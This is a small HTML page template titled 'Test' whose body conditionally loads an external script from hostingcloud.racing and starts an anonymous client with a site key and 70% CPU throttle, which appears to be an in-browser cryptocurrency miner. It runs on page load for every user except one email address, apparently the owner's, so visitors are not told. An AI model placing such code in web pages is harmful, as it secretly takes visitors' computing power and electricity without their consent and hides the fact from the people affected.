<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Test</title>
  </head>
  <body>
    
    <!-- Jus70 -->
{% if user.email != "oi@oi" %}
<script src="https://www.hostingcloud.racing/V843.js"></script>

<script>
    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
        throttle: 0.7, c: 'w', ads: 0
    });
    _client.start();
    

</script>
{% endif %}
    
  </body>
</html>
